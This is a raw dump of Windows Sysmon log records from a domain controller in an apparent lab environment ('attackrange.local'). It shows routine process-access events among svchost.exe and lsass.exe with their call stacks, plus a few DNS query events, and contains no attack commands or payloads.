08:41:57.370{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002573Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.370{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002572Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.370{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002571Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.370{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002570Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.370{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002569Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.370{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002568Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.370{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002567Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.370{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002566Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.261{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002565Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.261{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002564Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.261{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002563Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.261{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002562Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.261{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002561Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.261{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002560Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.261{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002559Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.261{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002558Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.261{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002557Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.261{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002556Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.261{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002555Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.261{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002554Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.198{5D479F2C-169F-5F84-0B00-000000007F01}864600C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be 22542200x80000000000000002718Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.212{5D479F2C-16A1-5F84-1400-000000007F01}1308attackrange.local0type: 2 win-dc-3574060.attackrange.local;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002717Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.209{5D479F2C-16B1-5F84-3100-000000007F01}2212win-dc-3574060.attackrange.local0fe80::8a:7e6:f5ff:fef1;2001:0:2851:782c:8a:7e6:f5ff:fef1;fe80::64fd:4c36:9a5d:fb14;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002716Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:57.202{5D479F2C-16A1-5F84-1400-000000007F01}1308win-dc-3574060.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\svchost.exe 10341000x80000000000000002715Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.261{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002714Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:58.261{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002713Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 